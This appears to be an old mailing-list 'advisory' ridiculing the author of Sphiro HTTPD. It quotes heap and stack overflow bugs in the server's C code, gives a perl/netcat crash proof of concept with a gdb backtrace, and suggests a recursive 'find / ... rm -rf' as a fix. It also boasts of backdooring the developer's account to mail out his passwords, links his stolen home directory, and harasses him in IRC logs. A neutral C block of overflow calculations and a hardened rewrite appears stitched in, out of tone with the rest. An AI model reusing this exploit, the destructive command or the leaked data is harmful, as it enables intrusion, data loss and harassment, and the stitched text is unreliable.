Message-ID: <3CD97F4E.1DFCA081@mail.gmail.com>
From: slotto at gmail.com (Slotto Corleone)
Subject: H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security)
Vulnerability: Sphiro HTTPD remote heap overflow
Affected Releases: Sphiro 0.1B by rave aka Jonny Mast
Vendor: http://www.rosiello.org/ Rosiello Security
Leader: Angelo Rosiello aka guilecool aka ImperialS ircnet takeover gang
irc.taintedknowledge.net #rosiello
Solution:
simple steps:
1. find / -name 'sphiro*' -exec rm -rf {} \;
2. don't run code written by "Rosiello Security"
3. troll @ irc.taintedknowledge.net #rosiello
Description:
.Topic (#rosiello): http://www.rosiello.org Welcome to Rosiello Security | nothing is neglected ! | sphiro httpd --> http://www.taintedknowledge.net/sphiro_release_0.1B.tar.gz -:- 0.2 has superduper multyplexing $rootdude style Yep verry 1337
-rw-r--r-- 1 slotto users 7123221 Apr 25 07:46 sphiro_release_0.1B.tar.gz
AHHHH wtf, 7 MB of source? No... Why the hell is PGP source in there?
:~/tmp/sphiro/icons$ ls -l
total 6172
-rw-r--r-- 1 slotto users 11390 Apr 19 13:56 403.jpg
-rw-r--r-- 1 slotto users 17139 Apr 19 13:56 404.jpg
-rw-r--r-- 1 slotto users 37025 Apr 19 13:56 500.jpg
-rw-r--r-- 1 slotto users 243 Aug 31 2002 back.png
-rw-r--r-- 1 slotto users 230 Aug 31 2002 folder.png
-rw------- 1 slotto users 6230275 Mar 29 09:23 pgp-6.5.1i-beta2.tar.gz
-rw-r--r-- 1 slotto users 250 Aug 31 2002 unknown.png
- sphiro/libhttp/http_socks.c

int get_request(int type, struct sockaddr_in client, int sc, SSL *s)
...
    char buffer[MAX_READ + 1];
    char auth_buff[MAX_READ + 1];
    char filename[128];
...
    if (!(request = strstr(buffer, "GET ")))
        return -1;
    request += strlen("GET ");
    if ((pb = strstr(request, "HTTP/1.1")) || (pb = strstr(request, "HTTP/1.1")))
        *(pb - 1) = '\0';
    if ((find_rullefile(request) == auth_file_present)) {
...
        sprintf(filename, "%s%s", config->webroot, request);   <-- oops
*** What the feck? This is written by someone who claims to find, exploit, and release advisories but goes and writes code like this? ***
- sphiro/libhttp/security.c   <-- security? heh

int find_rullefile(char *request)
...
    char *filename;
...
    filename = (char *) malloc(strlen(request) + strlen(config->webroot) + strlen("secure.auth") + 1);
...
    sprintf(filename, "%s/%s/secure.auth", config->webroot, request + 1);
*** nice attempt to dynamically allocate filename this time. but wait, what if we... ***
perl -e 'print "GET HTTP/1.1" . "A"x1000 . "\n\n"' |nc localhost 1338
request = "\0"
request+1 = "HTTP/1.1" . "A"x1000 . "\n\n"
ouch!
Core was generated by `./sphiro'.
Program terminated with signal 11, Segmentation fault.
#0 0x400e7123 in mallopt () from /lib/libc.so.6
(gdb) bt
#0 0x400e7123 in mallopt () from /lib/libc.so.6
#1 0x400e61e3 in malloc () from /lib/libc.so.6
#2 0x0804b2a4 in find_rullefile (request=0xbffff414 "") at security.c:62
#3 0x08049d8f in get_request (type=1, client=
{sin_family = 2, sin_port = 58496, sin_addr = {s_addr = 16777343},
sin_zero = "Z*\000\000\b@K?"}, sc=7, s=0x0) at http_socks.c:259
#4 0x08049c13 in start_daemon (port=91) at http_socks.c:146
#5 0x08049269 in main (argc=1094795585, argv=0x41414141) at sphiro.c:68
(gdb)
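The size accounting behind that backtrace, as an added illustration (not code from the advisory or from Sphiro): the two size functions reproduce the malloc() formula and the sprintf() format quoted from find_rullefile() and return how far the write overruns the allocation, first for a well-formed request and then for a constructed, shortened stand-in of the PoC request above; computed from the code as excerpted, the write is already one byte over for a normal request because the format's two '/' separators are never counted. build_auth_path() is an assumed hardened replacement, and the webroot "/var/www" is an assumption taken to have no trailing slash.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Size the quoted find_rullefile() passes to malloc(): it omits the two '/'
 * separators in the format and assumes request+1 is shorter than request. */
size_t sphiro_alloc_size(const char *webroot, const char *request)
{
    return strlen(request) + strlen(webroot) + strlen("secure.auth") + 1;
}
/* Bytes the quoted sprintf("%s/%s/secure.auth", webroot, request + 1) stores,
 * NUL included. Reads request+1 exactly as the original does, so `request`
 * must start a buffer that stays addressable past byte 0. */
size_t sphiro_write_size(const char *webroot, const char *request)
{
    return (size_t)snprintf(NULL, 0, "%s/%s/secure.auth", webroot, request + 1) + 1;
}
/* Bytes written past the end of the allocation; 0 means the write fits. */
size_t overflow_bytes(const char *webroot, const char *request)
{
    size_t alloc = sphiro_alloc_size(webroot, request);
    size_t written = sphiro_write_size(webroot, request);
    return written > alloc ? written - alloc : 0;
}
/* Constructed stand-in for the advisory's request after the parser planted its
 * '\0': byte 0 is the terminator, the payload follows (shortened to 10 bytes). */
const char sphiro_poc_request[] = "\0HTTP/1.1AAAAAAAAAA";
/* Hardened replacement (not the project's code): reject an empty or traversal
 * path, size the buffer from the format itself, and bound the final write. */
char *build_auth_path(const char *webroot, const char *request)
{
    if (request == NULL || request[0] != '/' || request[1] == '\0')
        return NULL;
    if (strstr(request, "..") != NULL)
        return NULL;
    int need = snprintf(NULL, 0, "%s%s/secure.auth", webroot, request);
    if (need < 0)
        return NULL;
    char *path = malloc((size_t)need + 1);
    if (path != NULL)
        snprintf(path, (size_t)need + 1, "%s%s/secure.auth", webroot, request);
    return path;
}
/* Test helper: 1 if build_auth_path() yields exactly `expected`, else 0. */
int auth_path_equals(const char *webroot, const char *request, const char *expected)
{
    char *path = build_auth_path(webroot, request);
    int ok = path != NULL && strcmp(path, expected) == 0;
    free(path);
    return ok;
}
```

The same sizing discipline applies to the fixed filename[128] in get_request(): derive the length from the format and the inputs, never from a guess.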
Unrelated but funny stories of rave (Jonny Mast) getting owned:
- rave gets his account backdoored on kokanin's box. He finds the obviously
  placed bindshell stashed as ~/bin/zsh. He laughs and says the backdoor
  was lame. Well, he obviously missed the getpass() LD_PRELOAD, ssh, and
  passwd all on his local account mailing all his new passwords out. Oh,
  and he left an exploit (servu.c) in his directory for the version of
  servu ftpd he was running on his home machine. Oops.
-== Remote Exploit for serv-u version v4.1 [MDTM] ==--
Code by: rave
Contact: rave@...iello.org
Date: Feb 2004
Here is his home directory:
http://fogheaven.phrack.nl/rave.tar.gz
Apr 24 08:20:13 <rave> im about to release my httpd
Apr 24 08:21:01 <rave> yes yes opensource
Apr 24 08:25:20 <rave> fixing the release of the httpd
Apr 24 08:27:50 <rave> does this look 1337 or what
Apr 24 08:27:51 <rave> chmod 777 $install/sphiro/{icons,errors}
Apr 24 08:29:10 * rave is working on the install .sh script that works with ./configure and the makefiles
...
Apr 24 08:37:27 <rave> ilja #rosiello misses you
Apr 24 08:38:32 <ilja> no 1 in #rosiello
Apr 24 08:39:35 <rave> i do
Apr 24 08:39:40 <rave> im rosiello
Apr 24 08:39:46 <rave> with 21 others
Apr 24 08:40:02 <rave> at tops since whe linked with 0x557 securitu
Apr 24 08:40:05 <rave> at tops since whe linked with 0x557 security
Apr 24 08:40:42 <rave> <-- mercy heeft verlaten (Ping timeout)
Apr 24 08:40:46 <rave> hmm
Apr 24 08:41:07 <rave> he died
Apr 24 08:41:16 <rave> on rosiello i think here as well
Apr 24 08:41:25 <rave> my knife actualy worked
Apr 24 08:41:30 <mercy> O_O
Apr 24 08:41:32 <mercy> right
...
Apr 24 10:09:22 <rave> http://www.taintedknowledge.net/images/people/rave.jpg
Apr 24 10:11:30 <rave> http://www.taintedknowledge.net/images/people/rosiello/
...
Apr 24 10:13:01 <ilja> nraziz is a member of rosiello ?
Apr 24 10:13:24 <rave> no
Apr 24 10:13:29 <rave> a visitor
Apr 24 10:13:33 <rave> mercy is a member
Apr 24 10:13:34 <rave> me
Apr 24 10:13:39 <ilja> mercy is ?
Apr 24 10:13:43 <ilja> didn't know that
Apr 24 10:13:50 <rave> ex w00w00 what his name again
Apr 24 10:13:55 <rave> and angelo
Apr 24 10:14:10 <rave> ex w00w00 napster
Apr 24 10:14:26 <rave> angelo,rave,napster,mercy
Apr 24 10:14:38 <ilja> mercy is really in rosiello ?
Apr 24 10:14:42 <ilja> i though you were kidding
Apr 24 10:15:06 <rave> no im not
...
Apr 24 10:17:23 <rave> no
Apr 24 10:17:33 <rave> angelo has some lag in updating the site
Apr 24 10:17:48 <rave> i was like 3 months in rosiello and still the site sayed
Apr 24 10:17:52 <rave> angelo,phinix
Apr 24 10:17:58 <rave> *phunix
Apr 24 10:18:07 <_demiurge> hey rave
Apr 24 10:18:19 <rave> in the mean while i released 6 remote exploits for windows
... a few hours later ...
... rave finds out GOBBLES hacked drunken.fi.st ...
Apr 24 13:25:18 <rave> KOKANIN UR BOX IS FUKCING HACKED AND ALL MY STUFF IS GONE!!!!!!!!!
Apr 24 13:25:19 <rave> ty
Apr 24 13:25:45 <rave> eted
Apr 24 13:25:45 <rave> <calibre> hmm
Apr 24 13:25:49 <rave> oops
Apr 24 13:26:02 <rave> /usr/X11R6/bin/xauth: timeout in locking authority file /home/rave/.Xauthorityhi from GOBBLES
Apr 24 13:26:02 <rave> rm: /home/GOBBLES_rave: Permission denied
Apr 24 13:26:02 <rave> cp: /tmp/suid_shell_rave: Permission denied
Apr 24 13:26:02 <rave> chmod: /tmp/suid_shell_rave: Operation not permitted
Apr 24 13:26:02 <rave> rave@...nken:~ $ls
Apr 24 13:26:03 <rave> rave@...nken:~ $ls
Apr 24 13:26:04 <rave> rave@...nken:~ $dir
Apr 24 13:26:06 <rave> -bash: dir: command not found
Apr 24 13:26:08 <rave> rave@...nken:~ $ls
Apr 24 13:26:12 <rave> rave@...nken:~ $
Apr 24 13:26:16 <rave> where is my research
Apr 24 13:26:59 <rave> who the fuck has bee g00fing on that box ?, report to me and ile show u how mad i am
Apr 24 13:27:16 <rave> that is like 2 years of research missig stupid fucks
Apr 24 13:27:24 <rave> bah
Apr 24 13:28:58 <rave> sorry i didnt realy intended to react like that but im mad i hope there are backups some where
Here is your backup rave: http://fogheaven.phrack.nl/rave.tar.gz
--- signature ---
chris, go feck a horse you coqknocker
| chris (~chris@...w.tkn.us) (United States of America)
. ircname : chris
| channels : @#rosiello #knasboll.se #rootshell #tkn
. server : irc.tx.us.taintedknowledge.net (Sponsored By Project 9 Studios)
| register : chris - is a registered nick
| operator : chris (is NOT an IRC warrior)
... You have been Network-Banned.
This terrorism was funded by:
Kajun, thanks for social engineering rave and taking the blame
boobys.org, LOL ROFFLE
<sorbo> Slotto Corleone il boss mafioso di Internet
#plan9, GNU assault team